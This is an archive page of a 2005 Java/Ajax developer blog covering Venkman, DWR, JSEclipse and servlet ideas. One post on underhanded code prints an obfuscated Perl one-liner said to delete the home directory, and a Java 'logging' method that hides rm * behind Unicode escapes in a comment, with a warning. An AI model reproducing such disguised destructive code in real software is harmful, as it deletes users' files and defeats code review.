Update: I've created a new permanent page for my Venkman patch:

Old blog content:

Currently you can't CAN!. See below for update. Previously Venkman (the Javascript debugger) would not install, and if you tried to hack it by downloading the .xpi file, unpacking it, altering the .rdf file to allow it to install, it crashed.

It appears that the issue is lack of interest from the developers in fighting for the attention of Mozilla central.

So I did a bit of digging and I think there is a patch for Venkman that might allow it to work. The patch is attached to this bug.

Has anyone made an installable Firefox plugin using this patch?

Slight side-track: While we are on the subject of Venkman, it is possible to alter the annoyingly huge fonts used in the source windows.

UPDATE: As JR Boyens noted, someone has made an XPI with the patches however it still had the version set to 1.1, so it still wouldn't install. So I had a hack, and while I was at it I reduced the size of the font in the source pane.

I am absoultely not about to start maintaining this thing. DWR is quite enough for me, but like me you might benefit from this quick hack.

You can download the xpi from here. This is a very simple hack so I promise nothing except that this will probably break, make your computer catch flames and then run off with your partner.

Responses[4]

Posted by Joe Walker on 29 September 2005 08:03:32 BST #

The underhanded C contest is all about writing C code that looks innocent enough to get past a security review, but does something nasty on the side. It got me thinking about how to subvert things in Java.

Somewhat predictably the C contest was dominated by a small number of tricks:

• Buffer overflow
• Array bounds violation
• Getting = and == the wrong way around

Java neatly sidesteps the first 2 by doing the checking for you. It’s kind of silly that we’re still fighting those 2 issues something like 30 years since they were first identified as being serious problems.

Java does a lot to shut down the =/== confusion by refusing to silently convert to a boolean. So Java programmers are a lot safer there too. Some code nearly got into the Linux kernel containing a just such a back-door:

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
    retval = -EINVAL;

The net effect was to become root rather than check you are root. Oops.

Java's Strengths: High alpha to punctuation ratio

Some languages resemble line noise, and consequently can be very hard to understand. Perl would be the obvious culprit. I’m told that the following will delete your home directory:

perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y;
 -/:-@[-`{-};`-{~" -;;s;;$_;see'

(I read it on Slashdot so it must be true. Of course I know you’re not going to test it out either so I could have just written rubbish above and no-one would know.)

Any language with a low alpha to punctuation ratio has plenty of scope for hiding malicious code in amongst innocent code. This is one of the reasons why generics has got a bad press – it lowers Java's alpha to punctuation ratio. It’s also the reason why I’m not too keen on regexs.

Java's Strengths: Security Manager

We perhaps ought to use this more than we do. I would guess that the vast majority of Java installations do not use the SecurityManager even in institutions that have high security requirements and don't particularly like trusting their programmers.

Java's Weaknesses

Java does have weaknesses, and the code below shows one of them.

I thought about using the trick of making immutable strings become mutable but decided there was a better way.

So here is my attempt at hiding malicious code using Java. It should be fairly obvious that the byte array contains "rm *" (which will delete all the files from the current directory on Unix) so that bit isn't well hidden. I guess I'd need to hide that bit away somewhere. The question is how did I subvert things so that the byte array at the bottom actually gets passed into the runtime.exec() at the top?

Since the code is Unix specific, on Windows I get the error message: "java.io.IOException: CreateProcess: rm * error=2":

DO NOT RUN THIS CODE UNLESS YOU REALLY WANT TO DELETE RANDOM FILES FROM YOUR COMPUTER. THE CODE BELOW IS MALICIOUS BUT IT IS DESIGNED TO LOOK INNOCENT.

import java.io.OutputStream;
import java.net.Socket;

public class Test {

  public static void main(String[] args) throws Exception {
    Test test = new Test();
    test.debug("hello");
  }

  public void debug(String msg) throws Exception {
    String s = "/usr/bin/logger ";
    Runtime r = Runtime.getRuntime();

    if (System.getProperty("os.name").equals("linux")) {
      /*
       * On linux we can make use of the  /usr/bin/logger command to keep
       * things simple.
       */
      r.exec(s + msg);
    }
    else {
      /*
       * Syslog code borrowed from log4j  by Ceki Gulc\u00FC
       * Network syslog calls must begin  with the following byte sequence:
       * \u002A\u002F \u0072 \u002E  \u0065\u0078\u0065c (\u0022 \u0072\u006D \u002A \u0022) \u003B \u002F\u002A<
       * followed by the message. For  more information see:
       *  http://cvs.apache.org/viewcvs.cgi/logging-log4j/src/java/org/apache/log4j/net/SyslogConstants.java?view=markup
       */
      Socket socket = new Socket("loghost", 514);
      OutputStream out = socket.getOutputStream();
      out.write(new byte[] { 0x2A, 0x2F, 0x72, 0x2E, 0x65, 0x78, 0x65, 0x22,  0x72, 0x6D, 0x22, 0x3B, 0x2F, 0x2A });
      out.write(msg.getBytes());
    }
  }
}

If you suss it out or if you have a clue, please comment.

Responses[11]

Posted by Joe Walker on 28 September 2005 08:00:16 BST #

I'm always looking out for better Javascript editors, and I now have a new favorite: JSEclipse. Check this out:

JSEditor appears to have an ESP layer that I've not worked out yet. This ESP layer enables it to give you completions that ought not to be possible.

Scarey

I have no idea how it can work out what the members of employee are since employee is an object that is dynamically generated by DWR, and the JavaScript file we are editing has no mention of even the path to the DWR server. (Maybe it's working it out by how employee is used? Either way it is fairly fancy)

Another example of it grokking Javascript much better than the Eclipse WTP Javascript editor is how it understands prototype.js. Sam doesn't hold back from exploiting Javascript features, and JSEclipse keeps up with him better than any other Javascript tool I've seen:

The outline right shows it correctly finding the things that prototype.js declares. The WTP editor makes a right mess of this.

Update: It appears to work based on usage - it remembers how an object is used and completes based on that.

Technorati tags: javascript eclipse

Responses[5]

Posted by Joe Walker on 27 September 2005 08:07:55 BST #

One major area where Open Source software leaves it's commercial counterparts quite a long way behind is integration with other projects.

A great example is Hibernate vs TopLink. If you look at the list of other projects they integrate with (open or closed source) you see a long list for Hibernate, and virtually nothing for TopLink.

Hibernate talks to: XDoclet, Commons-Logging (and Log4j etc), OSCache, JBossCache, C3P0 and other caching libraries, JUnit and that's before I start listing databases. The list of projects that talk to Hibernate starts with Spring and goes on for a long time.

I can find very little on the TopLink website about projects that it integrates with. They do advertise a new feature - that the latest version of Spring talks to it.

The same story is true of DWR:

• It can marshal XML from DOM, JDom, XOM and DOM4J
• It logs commons-logging to Log4j or JUL.
• It does scripted injection via BSF to BeanShell, Groovy, or a hundred other scripting languages.
• Through integration with Spring, you can get most places

And it seems that the story is the same all over open source land:

• Spring integrates with: Hibernate, Struts, WebWork, JSF, DWR, iBatis, Tiles, Velocity and millions more
• WebWork integrates with: JSTL, DWR, Velocity, XWork, ...
• Groovy integrates with: Ant, SWT, JEdit, ...
• JBoss integrates with: Tomcat, Hibernate, ...
• Tomcat integrates with: Ant, BSF, ...
• BSF integrates with: Xerces, Groovy, BeanShell, ...

It might be interesting to create a project map that shows projects and how they link to each other. My guess is that Spring, Ant and Commons-Logging would be in the middle.

This linking can be bad news. Sometimes you download a project only to find a twisted mesh of bizarre dependencies that just slows you down, but it can help too. If you are using Spring, the until the latest version, you'd be more likely to chose Hibernate over Toplink because of the Spring/Hibernate integration.

Why is the commercial world behind here?

Responses[5]

Posted by Joe Walker on 21 September 2005 10:16:53 BST #

Michael Nielsen wrote and interesting piece about thinking and mentions something Stephen Covey did in a seminar:

It's interesting how something so simple can change your actions, but more interesting to me is how blogging is similar to sitting at 6 O'Clock.

Since I've been writing this blog I've noticed that I've started to take more notes. Originally because I've thought "that's cool I might want to refer to that". But I think the process of taking notes has made me remember more.

The other day I was considering the design of a fairly complex login system and normally I would just have considered what I needed to authenticate the users, but since taking a few notes on Web 2.0 (from articles like this one) which makes the point about how important data is to big web-sites I've altered my thinking about how the login system should work. If data and an on-going conversation with customers is important then you don't want to throw data away nearly so much as you did when you were only interested in authentication.

So the notes I made because I blogged have altered how I design software, and for the better. Which I guess is the point Covey was making in the first place.

Has blogging made you a better at your job? You'll be answering in your blog using trackbacks of course ...

Responses[2]

Posted by Joe Walker on 20 September 2005 08:34:20 BST #

Dion, Jep and Harry have all wondered about how to cope with multiple concurrent XMLHttpRequest calls, and asked what will break.

One of the DWR unit tests configurations is to run all 200+ tests in parallel. I then load up IE/FF/Op all doing their 200 tests at the same time, at the same time.

I can say that the iframe implementation of Ajax on DWR creaks under IE, but XHR works just fine everywhere. That is to say the server correctly replies to all 600 vaguely concurrent requests without error. To be honest I'm even surprised that Windows can cope.

The lesson is - don't write your own Ajax code. Use a library like prototype or DWR.

You can run the tests yourself. Just download the war file, deploy, go to the /dwr URL, click on the unit tests link and play. Tell me if you manage to break it!

DWR has taught me a neat trick when it comes to mixing Java with different languages. Any language will do; Ruby on Rails, PHP, I'm sure we could russle up something with forth or whitespace.

The DWR website runs on Drupal (more on this in a bit) and Drupal is powered by PHP, but it still manages to run with DWR (for example, see the table demo). The trick is that DWR integrates simply at a Javascript/HTML level so, so long as your chosen front end language can produce Javascript and HTML, you're fine using it with DWR.

Part of the original thinking was to make DWR work properly with Struts, Webwork, etc, etc, etc without having yet another framework that takes over. We just discovered that working this way with SpringMVC and Wicket means we can also fit in with RoR and Zope too. All I know of Stripes is what I've read in Matt's blog but I'm sure DWR would fit in just fine there too.

Java and Drupal and Architecture

I think Java and PHP people are on different planets when they think about application architecture.

Drupal is supposed to work with Postgres, and I'm not keen on MySQL (the recent slashdot thread confirmed my feelings on this), so when we started to use Drupal it was on Postgres. But Drupal doesn't support Postgres like they say it does, so I got to digging around in the code a bit. And oooch.

I've seen Drupal people note that it is well architected, so I'd guess there is some logic to it, but I'll admit to not being able to see it. The PHP code is mixed in with SQL and HTML all in the same file. And the SQL seems to be MySQL specific, but there seems to be a processing stage to make it more Postgres compliant (it doesn't seem to work though).

If you tried this sort of thing in Java, you'd be laughed at. So why does this sort of thing go down well in PHP land?

Any ideas?

Responses[6]

Posted by Joe Walker on 08 September 2005 09:02:12 BST #

Someone has been busy pushing the boundaries of the web ...

I notice that they even tried to patent it (3rd from the bottom, RHS). However you'll be pleased to know that the patent has expired now.

The popularity of Ajax and the trend towards richer user interfaces changes the way applications work, and that means we need to check that that the software architecture we are using will still fit in a more Ajax world. Your combination of frameworks and libraries and jar files may be good for now, but what about tomorrow?

Read more...

Responses[2]

Posted by Joe Walker on 06 September 2005 09:54:14 BST #

Some weeks ago Greg Murray wanted ideas for the next version of the servlet spec. I had an idea that would really help with working with many frameworks.

Originally J2EE was designed with componentization at a WAR and EJB-JAR file level. I think the idea was that you'd get a set of WAR and EJB-JAR files bundle them up in an EAR and poof! Radical new web-app. I'm sure someone will correct me and tell me that wasn't the plan, but that's certainly the way is looks to me right now.

What has happened is that things have been componentized at a more granular level. For example Spring contributes an OpenSessionInViewFilter, DWR contributes an Ajax servlet, Struts, Webwork, etc contribute controller servlets. All of these come with instructions about a whole set of incantations to put into your WEB-INF/web.xml file.

So the solution is simple - We need a new element like this:

<include src="WEB-INF/lib/dwr.jar!ajax.xml"/>

This would allow web frameworks and libraries to export a set of web.xml insert files. And you could make use of some functionality with a single line.

It might be a good idea to have a <param...> mechanism to allow you to customize the action of the web.xml insert file.

Benefits

• Less typing, and less cut and paste errors.
• Clearer demarcation about what does what in your web.xml file.
• Much simpler web.xml files, you only need to define what you have written, and just link to the stuff you are re-using.
• The ability to have several different configs and switch between them without getting lost in comments. This is particularly good for altering security settings.

What do you think?

Technorati tags: servlet

Responses[7]

Posted by Joe Walker on 01 September 2005 12:30:50 BST #